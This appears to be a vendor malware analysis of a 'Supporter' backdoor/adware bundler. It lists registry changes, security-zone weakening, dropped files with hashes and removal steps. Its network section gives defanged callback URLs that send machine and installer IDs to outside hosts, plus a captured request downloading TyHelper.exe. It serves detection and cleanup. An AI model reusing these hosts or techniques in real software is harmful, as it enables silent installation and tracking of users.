[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"e46c271e" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"LRTS" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"27ddcf6f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Version" = "22022115"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"bbf88800" = "///%"
"f0bf0bde" = "///%"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 22 EC 7F EB E8 66 A0 18 30 12 CF 8D A6 41 3F"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"7f69fa1f" = "///%"
"6185d035" = "VP/h/CP/V//l////"
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"uuid" = "4520001523740530703"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a1dcff5b" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"State" = "0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"370856c7" = ""
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
"e46c271e" = "///%"
"1520c6f1" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"65114b36" = "Vl/l////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f0bf0bde" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"3c09c42b" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a0743acc" = "N/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"370856c7" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"
"dbaf3ce3" = "/P////%%"
"c99a5f5c" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2e22d94e" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"8b9e4cbc" = "V/////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"f6ad6fa6" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"usr.1" = "mPgPJqqomjlhabcdef"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"svn" = "Supporter"
"svi" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"1520c6f1" = "V/////%%"
"414bc593" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"51d2f2ea" = "JlA /Y//b/Ak/YZ/c//x/W//I//x/CD/Ux/e////"
"587b5709" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"svx" = ""
"svt" = "1421537600"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
"6185d035" = "VP/h/CP/V//l////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"bbf88800" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Install_Dir" = "%Program Files%\Supporter"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0e93c3f3" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"48bd1aff" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"340d3099" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"NoRepair" = "1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0dc3ee96" = "/P////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"date" = "1421549098"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"65114b36" = "Vl/l////"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f6ad6fa6" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\SUPPOR~1\SUPPOR~1.DLL,_uninstall /un"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c24899a6" = "Vx/g/CD/Mx////%%"
"a1dcff5b" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"dlpath" = "c:\progra~1\suppor~1\suppor~1.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2e22d94e" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"uuid" = "4520001523740530703"
"svpath" = "c:\Program Files\Supporter\Supporter.dll"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"48bd1aff" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"data.0" = "Us ACoyoi 0Qlyurpnwx3D2nv2Ut4mOfyO1WapHlU9CKgtsUB7YxfB3uleoimov9WVC6rV2pn"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"0e93c3f3" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"InstallDate" = "20140118"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"40030ae4" = "%Program Files%\Supporter\Supporter.dll"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"72758a5d" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c99a5f5c" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
"7367429f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c24899a6" = "Vx/g/CD/Mx////%%"
"7f69fa1f" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"data.1" = "vPDqmdgAz93mBQIKEGmwWrniVNmX4IyloC5C8UlL9Tzl kgwiT507PnkLLOUSDtbV5/KcNAaxKop4V7umwZJwEJLo"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"fe94ce1e" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"3efeb33e" = ""
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| 8af622327e2c6ef36dd2b147ec7d25b7 | c:\Program Files\Follow\Follow.exe |
| d32d158eff9112caba8eea4ba9ca5975 | c:\Program Files\PriceLeses\NoXzg4pkazG9ZC.dll |
| 8af622327e2c6ef36dd2b147ec7d25b7 | c:\Program Files\PriceLeses\NoXzg4pkazG9ZC.exe |
| d32d158eff9112caba8eea4ba9ca5975 | c:\Program Files\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll |
| 8af622327e2c6ef36dd2b147ec7d25b7 | c:\Program Files\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
mscorsvw.exe:172
regsvr32.exe:388
regsvr32.exe:1776
rundll32.exe:1848
rundll32.exe:1324
%original file name%.exe:2008
%original file name%.exe:1664
%original file name%.exe:1252
%original file name%.exe:596
TyHelpTFUO.exe:1516 - Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%Documents and Settings%\%current user%\Local Settings\Temp\3e88bb2a\temp.ca (10801 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@masterial[1].txt (219 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dll (3927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\CmPMt7BDxLvtoE[1].ca (5431 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.dat (26 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.tlb (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\loader.gif (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\cd5b15e575e1c3d03eba457016c7580f.ini (508 bytes)
%Program Files%\PriceLeses\NoXzg4pkazG9ZC.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2027aD4c704\images\progressbar.gif (588 bytes)
%Program Files%\Follow\Follow.dat (6 bytes)
%Program Files%\Follow\Follow.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\wKjUaVakO6heQO[1].ca (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00f6573f\temp.ca (1491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f77a858\temp.ca (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\68f19A9f\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[2] (2 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4bE3F8f474\images\loader.gif (2 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll (3927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\28aa5195\temp.ca (10294 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bestories[1].txt (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\yNMtlpV56NSC6w[1].ca (5431 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dat (24 bytes)
%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.tlb (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1[1].txt (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1.ini.task (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_4.ini.task (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\r1.flagmisterlibcontent[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_2_1[1].txt (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\steps\1_1_3.ini.task (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_4.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1_3.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\images\progressbar.gif (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2_1.ini.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1.ini.tmp (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\%original file name%.exe (37624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_2.ini.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1UF09EN\1_1[1].txt (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9LLCZ7S\1_1_3[1].txt (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\1_1.ini.tmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\1_2[1].txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\r1.flagmisterlibcontent[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A7958A1c7b9\temp\bg.ca (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\STGTGBKJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TL9OQ0XO\1_1_4[1].txt (10 bytes)
%Program Files%\Supporter\Supporter.dll (262021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (28502 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 356105 | 356352 | 4.87791 | 107f80c7b2497b87f17b6053858abc7c |
| .rdata | 360448 | 20226 | 20480 | 3.32227 | 0425f360dbef9ea530c9d62bd96a0497 |
| .data | 380928 | 863812 | 854016 | 4.18045 | be5e4e00140775f479c4438504b275b9 |
| .rsrc | 1245184 | 112471 | 114688 | 3.73244 | 520e3ad746a2e820383856d794eb62d1 |
| .reloc | 1359872 | 9890 | 10240 | 3.164 | ae41b41c919a7e9d9def9fe8386787e2 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://flagmisterlibcontent.net/ | |
| hxxp://flagmisterlibcontent.net/?step_id=1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | |
| hxxp://flagmisterlibcontent.net/?step_id=1_1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | |
| hxxp://masterial.net/?e=dfd73&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=55680&&&country=US&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 | 104.28.23.111 |
| hxxp://flagmisterlibcontent.net/?step_id=1_1_3&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | |
| hxxp://bestories.org/?e=ytr&cht=2&dd=19&clsb=1&publisher=55680&country=US&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 | 104.28.11.38 |
| hxxp://flagmisterlibcontent.net/?step_id=1_1_4&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | |
| hxxp://bestories.org/?e=bsp&clsb=1&publisher=55680&country=US&dd=5&cid=767&vn=153&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 | 104.28.11.38 |
| hxxp://flagmisterlibcontent.net/?step_id=1_2&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | |
| hxxp://settlemental.net/TyHelper.exe | 54.68.119.243 |
| hxxp://c1.winnerican.info/?step_id=1_2&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | 54.69.32.99 |
| hxxp://c1.winnerican.info/?step_id=1_1_4&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | 54.69.32.99 |
| hxxp://r1.flagmisterlibcontent.net/ | 54.69.32.99 |
| hxxp://c1.winnerican.info/?step_id=1_1_3&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | 54.69.32.99 |
| hxxp://c1.winnerican.info/?step_id=1_1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | 54.69.32.99 |
| hxxp://c1.winnerican.info/?step_id=1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A | 54.69.32.99 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
HEAD /TyHelper.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: settlemental.net
Connection: Keep-Alive
HTTP/1.1 100 ContinueHTTP/1.1 200 OK..Server: openresty..Date: Sun, 18 Jan 2015 04:44:26 GMT..Content-Type: application/octet-stream..Content-Length: 6475776..Last-Modified: Fri, 09 Jan 2015 04:20:07 GMT..Connection: close..ETag: "54af56f7-62d000"..Accept-Ranges: bytes..
